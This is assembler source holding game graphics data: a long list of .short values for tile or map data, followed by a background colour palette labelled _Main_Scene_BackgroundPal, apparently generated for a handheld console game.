.short 771 ; 0x303
.short 11066 ; 0x2b3a
.short 14891 ; 0x3a2b
.short 771 ; 0x303
.short 30312 ; 0x7668
.short 14851 ; 0x3a03
.short 826 ; 0x33a
.short 911 ; 0x38f
.short 24415 ; 0x5f5f
.short 886 ; 0x376
.short 30211 ; 0x7603
.short 886 ; 0x376
.short 24415 ; 0x5f5f
.short 26719 ; 0x685f
.short 22888 ; 0x5968
.short 872 ; 0x368
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47107 ; 0xb803
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 769 ; 0x301
.short 52380 ; 0xcc9c
.short 52428 ; 0xcccc
.short 52428 ; 0xcccc
.short 39939 ; 0x9c03
.short 41377 ; 0xa1a1
.short 41377 ; 0xa1a1
.short 34977 ; 0x88a1
.short 39683 ; 0x9b03
.short 25443 ; 0x6363
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 39683 ; 0x9b03
.short 34977 ; 0x88a1
.short 25480 ; 0x6388
.short 25443 ; 0x6363
.short 39683 ; 0x9b03
.short 41377 ; 0xa1a1
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 39683 ; 0x9b03
.short 25443 ; 0x6363
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 39683 ; 0x9b03
.short 24737 ; 0x60a1
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 39884 ; 0x9bcc
.short 52379 ; 0xcc9b
.short 27340 ; 0x6acc
.short 259 ; 0x103
.short 34952 ; 0x8888
.short 25443 ; 0x6363
.short 37216 ; 0x9160
.short 874 ; 0x36a
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 24675 ; 0x6063
.short 361 ; 0x169
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 24675 ; 0x6063
.short 361 ; 0x169
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 361 ; 0x169
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 361 ; 0x169
.short 25440 ; 0x6360
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 24407 ; 0x5f57
.short 24424 ; 0x5f68
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 26728 ; 0x6868
.short 24464 ; 0x5f90
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 26728 ; 0x6868
.short 36959 ; 0x905f
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 24415 ; 0x5f5f
.short 37008 ; 0x9090
.short 24415 ; 0x5f5f
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 24424 ; 0x5f68
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 22367 ; 0x575f
.short 26719 ; 0x685f
.short 26728 ; 0x6868
.short 24464 ; 0x5f90
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 36959 ; 0x905f
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 37008 ; 0x9090
.short 24415 ; 0x5f5f
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 24424 ; 0x5f68
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 22367 ; 0x575f
.short 26719 ; 0x685f
.short 26728 ; 0x6868
.short 24464 ; 0x5f90
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 36959 ; 0x905f
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 37008 ; 0x9090
.short 24415 ; 0x5f5f
.short 22359 ; 0x5757
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 22367 ; 0x575f
.short 360 ; 0x168
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 360 ; 0x168
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 22367 ; 0x575f
.short 360 ; 0x168
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 360 ; 0x168
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22367 ; 0x575f
.short 360 ; 0x168
.short 26728 ; 0x6868
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 0 ; 0x0
.short 55809 ; 0xda01
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 55809 ; 0xda01
.short 1 ; 0x1
.short 0 ; 0x0
.short 256 ; 0x100
.short 55990 ; 0xdab6
.short 434 ; 0x1b2
.short 0 ; 0x0
.short 256 ; 0x100
.short 56016 ; 0xdad0
.short 436 ; 0x1b4
.short 0 ; 0x0
.short 46593 ; 0xb601
.short 46810 ; 0xb6da
.short 8112 ; 0x1fb0
.short 1 ; 0x1
.short 53251 ; 0xd003
.short 46810 ; 0xb6da
.short 45232 ; 0xb0b0
.short 1 ; 0x1
.short 56017 ; 0xdad1
.short 55769 ; 0xd9d9
.short 45238 ; 0xb0b6
.short 287 ; 0x11f
.short 56016 ; 0xdad0
.short 55769 ; 0xd9d9
.short 45238 ; 0xb0b6
.short 944 ; 0x3b0
.short 0 ; 0x0
.short 55809 ; 0xda01
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 55809 ; 0xda01
.short 1 ; 0x1
.short 0 ; 0x0
.short 256 ; 0x100
.short 55990 ; 0xdab6
.short 434 ; 0x1b2
.short 0 ; 0x0
.short 256 ; 0x100
.short 56016 ; 0xdad0
.short 436 ; 0x1b4
.short 0 ; 0x0
.short 46593 ; 0xb601
.short 46810 ; 0xb6da
.short 8112 ; 0x1fb0
.short 1 ; 0x1
.short 53249 ; 0xd001
.short 46810 ; 0xb6da
.short 45232 ; 0xb0b0
.short 1 ; 0x1
.short 55990 ; 0xdab6
.short 55769 ; 0xd9d9
.short 45238 ; 0xb0b6
.short 287 ; 0x11f
.short 56016 ; 0xdad0
.short 55769 ; 0xd9d9
.short 45238 ; 0xb0b6
.short 944 ; 0x3b0
.short 46849 ; 0xb701
.short 10452 ; 0x28d4
.short 47828 ; 0xbad4
.short 48168 ; 0xbc28
.short 256 ; 0x100
.short 18871 ; 0x49b7
.short 47619 ; 0xba03
.short 841 ; 0x349
.short 0 ; 0x0
.short 769 ; 0x301
.short 771 ; 0x303
.short 771 ; 0x303
.short 256 ; 0x100
.short 47657 ; 0xba29
.short 54980 ; 0xd6c4
.short 50372 ; 0xc4c4
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 10497 ; 0x2901
.short 48312 ; 0xbcb8
.short 54484 ; 0xd4d4
.short 48316 ; 0xbcbc
.short 17665 ; 0x4501
.short 47689 ; 0xba49
.short 54484 ; 0xd4d4
.short 47802 ; 0xbaba
.short 17665 ; 0x4501
.short 47689 ; 0xba49
.short 54484 ; 0xd4d4
.short 47802 ; 0xbaba
.short 954 ; 0x3ba
.short 18874 ; 0x49ba
.short 47619 ; 0xba03
.short 297 ; 0x129
.short 47619 ; 0xba03
.short 841 ; 0x349
.short 10682 ; 0x29ba
.short 1 ; 0x1
.short 771 ; 0x303
.short 771 ; 0x303
.short 259 ; 0x103
.short 0 ; 0x0
.short 47802 ; 0xbaba
.short 47802 ; 0xbaba
.short 10569 ; 0x2949
.short 1 ; 0x1
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 47288 ; 0xb8b8
.short 47288 ; 0xb8b8
.short 17733 ; 0x4545
.short 297 ; 0x129
.short 18761 ; 0x4949
.short 18761 ; 0x4949
.short 10057 ; 0x2749
.short 837 ; 0x345
.short 18761 ; 0x4949
.short 18761 ; 0x4949
.short 10057 ; 0x2749
.short 837 ; 0x345
.short 39683 ; 0x9b03
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 34915 ; 0x8863
.short 39683 ; 0x9b03
.short 24737 ; 0x60a1
.short 25440 ; 0x6360
.short 34915 ; 0x8863
.short 39683 ; 0x9b03
.short 25505 ; 0x63a1
.short 25443 ; 0x6363
.short 24737 ; 0x60a1
.short 39683 ; 0x9b03
.short 25480 ; 0x6388
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 39683 ; 0x9b03
.short 34912 ; 0x8860
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 27139 ; 0x6a03
.short 24673 ; 0x6061
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 769 ; 0x301
.short 26986 ; 0x696a
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 256 ; 0x100
.short 257 ; 0x101
.short 257 ; 0x101
.short 771 ; 0x303
.short 25440 ; 0x6360
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 25440 ; 0x6360
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 873 ; 0x369
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 24675 ; 0x6063
.short 873 ; 0x369
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 25699 ; 0x6463
.short 874 ; 0x36a
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 27241 ; 0x6a69
.short 259 ; 0x103
.short 771 ; 0x303
.short 257 ; 0x101
.short 257 ; 0x101
.short 1 ; 0x1
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 22359 ; 0x5757
.short 24407 ; 0x5f57
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 22359 ; 0x5757
.short 26719 ; 0x685f
.short 24424 ; 0x5f68
.short 24415 ; 0x5f5f
.short 24407 ; 0x5f57
.short 24424 ; 0x5f68
.short 24415 ; 0x5f5f
.short 36968 ; 0x9068
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 24415 ; 0x5f5f
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26719 ; 0x685f
.short 24424 ; 0x5f68
.short 24415 ; 0x5f5f
.short 24407 ; 0x5f57
.short 24424 ; 0x5f68
.short 24415 ; 0x5f5f
.short 36968 ; 0x9068
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 24407 ; 0x5f57
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24464 ; 0x5f90
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 37008 ; 0x9090
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 24415 ; 0x5f5f
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 22367 ; 0x575f
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22359 ; 0x5757
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 36959 ; 0x905f
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 37008 ; 0x9090
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26768 ; 0x6890
.short 24424 ; 0x5f68
.short 22359 ; 0x5757
.short 24407 ; 0x5f57
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26719 ; 0x685f
.short 24424 ; 0x5f68
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 24415 ; 0x5f5f
.short 36968 ; 0x9068
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 26719 ; 0x685f
.short 36968 ; 0x9068
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 24415 ; 0x5f5f
.short 26728 ; 0x6868
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 24407 ; 0x5f57
.short 26719 ; 0x685f
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 22367 ; 0x575f
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 24424 ; 0x5f68
.short 24407 ; 0x5f57
.short 22367 ; 0x575f
.short 872 ; 0x368
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 22367 ; 0x575f
.short 360 ; 0x168
.short 39367 ; 0x99c7
.short 39321 ; 0x9999
.short 39321 ; 0x9999
.short 37792 ; 0x93a0
.short 26823 ; 0x68c7
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 22376 ; 0x5768
.short 26823 ; 0x68c7
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 22376 ; 0x5768
.short 26823 ; 0x68c7
.short 55912 ; 0xda68
.short 26777 ; 0x6899
.short 22376 ; 0x5768
.short 26823 ; 0x68c7
.short 39272 ; 0x9968
.short 22425 ; 0x5799
.short 22376 ; 0x5768
.short 26823 ; 0x68c7
.short 26728 ; 0x6868
.short 22359 ; 0x5757
.short 22376 ; 0x5768
.short 26772 ; 0x6894
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 22376 ; 0x5768
.short 22298 ; 0x571a
.short 22359 ; 0x5757
.short 22359 ; 0x5757
.short 22359 ; 0x5757
.short 39328 ; 0x99a0
.short 39321 ; 0x9999
.short 39321 ; 0x9999
.short 37792 ; 0x93a0
.short 26777 ; 0x6899
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 22376 ; 0x5768
.short 26777 ; 0x6899
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 22376 ; 0x5768
.short 26777 ; 0x6899
.short 55912 ; 0xda68
.short 26777 ; 0x6899
.short 22376 ; 0x5768
.short 26777 ; 0x6899
.short 39272 ; 0x9968
.short 22425 ; 0x5799
.short 22376 ; 0x5768
.short 26777 ; 0x6899
.short 26728 ; 0x6868
.short 22359 ; 0x5757
.short 22376 ; 0x5768
.short 26777 ; 0x6899
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 22376 ; 0x5768
.short 22376 ; 0x5768
.short 22359 ; 0x5757
.short 22359 ; 0x5757
.short 22359 ; 0x5757
.globl _Main_Scene_BackgroundPal ; @Main_Scene_BackgroundPal
.p2align 2
_Main_Scene_BackgroundPal:
.short 0 ; 0x0
.short 4228 ; 0x1084
.short 4262 ; 0x10a6
.short 7399 ; 0x1ce7
.short 322 ; 0x142
.short 4421 ; 0x1145
.short 3493 ; 0xda5
.short 422 ; 0x1a6
.short 455 ; 0x1c7
.short 4582 ; 0x11e6
.short 6598 ; 0x19c6
.short 8455 ; 0x2107
.short 1225 ; 0x4c9
.short 5290 ; 0x14aa
.short 2093 ; 0x82d
.short 3119 ; 0xc2f
.short 6350 ; 0x18ce
.short 4456 ; 0x1168
.short 4395 ; 0x112b
.short 490 ; 0x1ea
.short 4522 ; 0x11aa
.short 1292 ; 0x50c
.short 2349 ; 0x92d
.short 3405 ; 0xd4d
.short 4396 ; 0x112c
.short 5452 ; 0x154c
.short 5423 ; 0x152f
.short 9512 ; 0x2528
.short 11595 ; 0x2d4b
.short 14763 ; 0x39ab
.short 12684 ; 0x318c
.short 14798 ; 0x39ce
.short 20769 ; 0x5121
.short 21826 ; 0x5542
.short 19815 ; 0x4d67
.short 19847 ; 0x4d87
.short 25029 ; 0x61c5
.short 26086 ; 0x65e6
.short 27111 ; 0x69e7
.short 19784 ; 0x4d48
.short 20874 ; 0x518a
.short 23021 ; 0x59ed
.short 515 ; 0x203
.short 8711 ; 0x2207
.short 3593 ; 0xe09
.short 554 ; 0x22a
.short 7688 ; 0x1e08
.short 682 ; 0x2aa
.short 5832 ; 0x16c8
.short 7913 ; 0x1ee9
.short 621 ; 0x26d
.short 7756 ; 0x1e4c
.short 4845 ; 0x12ed
.short 5775 ; 0x168f
.short 7855 ; 0x1eaf
.short 11882 ; 0x2e6a
.short 12907 ; 0x326b
.short 12939 ; 0x328b
.short 16110 ; 0x3eee
.short 7946 ; 0x1f0a
.short 6957 ; 0x1b2d
.short 8013 ; 0x1f4d
.short 4942 ; 0x134e
.short 27143 ; 0x6a07
.short 29222 ; 0x7226
.short 32487 ; 0x7ee7
.short 17934 ; 0x460e
.short 18990 ; 0x4a2e
.short 19023 ; 0x4a4f
.short 24077 ; 0x5e0d
.short 30280 ; 0x7648
.short 32331 ; 0x7e4b
.short 29417 ; 0x72e9
.short 25102 ; 0x620e
.short 29292 ; 0x726c
.short 32364 ; 0x7e6c
.short 32397 ; 0x7e8d
.short 32430 ; 0x7eae
.short 32463 ; 0x7ecf
.short 17167 ; 0x430f
.short 29449 ; 0x7309
.short 29450 ; 0x730a
.short 30540 ; 0x774c
.short 31597 ; 0x7b6d
.short 32654 ; 0x7f8e
.short 4181 ; 0x1055
.short 4279 ; 0x10b7
.short 3378 ; 0xd32
.short 4464 ; 0x1170
.short 4435 ; 0x1153
.short 1489 ; 0x5d1
.short 2513 ; 0x9d1
.short 6578 ; 0x19b2
.short 7634 ; 0x1dd2
.short 341 ; 0x155
.short 4404 ; 0x1134
.short 3540 ; 0xdd4
.short 4597 ; 0x11f5
.short 6551 ; 0x1997
.short 9520 ; 0x2530
.short 10577 ; 0x2951
.short 8627 ; 0x21b3
.short 8690 ; 0x21f2
.short 12690 ; 0x3192
.short 8663 ; 0x21d7
.short 14805 ; 0x39d5
.short 15862 ; 0x3df6
.short 5240 ; 0x1478
.short 6297 ; 0x1899
.short 7354 ; 0x1cba
.short 5338 ; 0x14da
.short 9468 ; 0x24fc
.short 7480 ; 0x1d38
.short 3423 ; 0xd5f
.short 5437 ; 0x153d
.short 4479 ; 0x117f
.short 6591 ; 0x19bf
.short 8539 ; 0x215b
.short 9720 ; 0x25f8
.short 11581 ; 0x2d3d
.short 8638 ; 0x21be
.short 8703 ; 0x21ff
.short 6864 ; 0x1ad0
.short 7764 ; 0x1e54
.short 8723 ; 0x2213
.short 8724 ; 0x2214
.short 880 ; 0x370
.short 7024 ; 0x1b70
.short 914 ; 0x392
.short 5008 ; 0x1390
.short 5043 ; 0x13b3
.short 4020 ; 0xfb4
.short 980 ; 0x3d4
.short 4054 ; 0xfd6
.short 7768 ; 0x1e58
.short 6683 ; 0x1a1b
.short 7770 ; 0x1e5a
.short 666 ; 0x29a
.short 4760 ; 0x1298
.short 4827 ; 0x12db
.short 7775 ; 0x1e5f
.short 732 ; 0x2dc
.short 4860 ; 0x12fc
.short 10777 ; 0x2a19
.short 8762 ; 0x223a
.short 8794 ; 0x225a
.short 11899 ; 0x2e7b
.short 12891 ; 0x325b
.short 14970 ; 0x3a7a
.short 10938 ; 0x2aba
.short 10780 ; 0x2a1c
.short 8831 ; 0x227f
.short 10847 ; 0x2a5f
.short 13948 ; 0x367c
.short 14972 ; 0x3a7c
.short 10940 ; 0x2abc
.short 11997 ; 0x2edd
.short 10943 ; 0x2abf
.short 11999 ; 0x2edf
.short 12957 ; 0x329d
.short 15004 ; 0x3a9c
.short 12990 ; 0x32be
.short 15006 ; 0x3a9e
.short 14047 ; 0x36df
.short 1821 ; 0x71d
.short 3868 ; 0xf1c
.short 3933 ; 0xf5d
.short 831 ; 0x33f
.short 1887 ; 0x75f
.short 3967 ; 0xf7f
.short 4893 ; 0x131d
.short 4957 ; 0x135d
.short 5983 ; 0x175f
.short 3999 ; 0xf9f
.short 12093 ; 0x2f3d
.short 14270 ; 0x37be
.short 16912 ; 0x4210
.short 20080 ; 0x4e70
.short 20082 ; 0x4e72
.short 21138 ; 0x5292
.short 21140 ; 0x5294
.short 24309 ; 0x5ef5
.short 23254 ; 0x5ad6
.short 26192 ; 0x6650
.short 28305 ; 0x6e91
.short 27315 ; 0x6ab3
.short 30386 ; 0x76b2
.short 27318 ; 0x6ab6
.short 31445 ; 0x7ad5
.short 20338 ; 0x4f72
.short 21331 ; 0x5353
.short 21395 ; 0x5393
.short 23477 ; 0x5bb5
.short 32593 ; 0x7f51
.short 32659 ; 0x7f93
.short 25366 ; 0x6316
.short 31510 ; 0x7b16
.short 32660 ; 0x7f94
.short 32726 ; 0x7fd6
.short 17117 ; 0x42dd
.short 17118 ; 0x42de
.short 18203 ; 0x471b
.short 17402 ; 0x43fa
